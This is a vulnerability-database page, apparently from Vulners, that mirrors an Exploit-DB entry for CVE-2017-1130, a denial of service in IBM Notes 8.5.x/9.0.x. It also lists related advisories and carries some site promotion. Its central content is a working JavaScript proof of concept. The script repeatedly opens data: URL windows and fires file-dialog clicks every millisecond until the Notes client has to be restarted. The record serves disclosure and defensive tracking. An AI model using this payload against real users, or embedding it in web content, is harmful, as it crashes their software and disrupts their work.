Lucene search
K

IBM Notes 8.5.x/9.0.x - Denial of Service (2)

🗓️ 31 Aug 2017 00:00:00Reported by Dhiraj MishraType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

IBM Notes 8.5.x/9.0.x - Denial of Service vulnerability via malicious lin

Related
Code
ReporterTitlePublishedViews
Family
0day.today
IBM Notes 8.5.x/9.0.x - Denial of Service (2) Exploit
4 Sep 201700:00
zdt
0day.today
IBM Lotus Notes Denial Of Service Exploit
9 Nov 201700:00
zdt
Circl
CVE-2017-1130
31 Aug 201700:00
circl
CNVD
IBM Notes Denial of Service Vulnerability (CNVD-2017-25669)
6 Sep 201700:00
cnvd
CVE
CVE-2017-1130
5 Sep 201721:00
cve
Cvelist
CVE-2017-1130
5 Sep 201721:00
cvelist
exploitpack
IBM Notes 8.5.x9.0.x - Denial of Service (2)
31 Aug 201700:00
exploitpack
Metasploit
IBM Notes Denial Of Service
10 Oct 201706:52
metasploit
NVD
CVE-2017-1130
5 Sep 201721:29
nvd
OSV
CVE-2017-1130
5 Sep 201721:29
osv
Rows per page
# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
# Exploit Author: Dhiraj Mishra 
# Contact: http://twitter.com/mishradhiraj_
# Website: http://datarift.blogspot.in/
# CVE: CVE-2017-1130
# Category:  IBM Notes (Console Application)
 
 
1. Description
 
IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted. 
 
2. Proof of concept
 
<script>
var w;
var wins = {};
var i = 1;
f.click();
setInterval("f.click()", 1);
setInterval(function(){
	for (var k in wins) {
		// after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
		if (wins[k] && wins[k].status === undefined) {
			wins[k].close();
			delete wins[k];
		}
	}
	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
	if (w) {
		wins[i] = w;
		i++;
	}
}, 1);
</script>
 
 
3. IBM Security Bulletin
 
http://www-01.ibm.com/support/docview.wss?uid=swg21999384

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Aug 2017 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 36.5
EPSS0.6548
26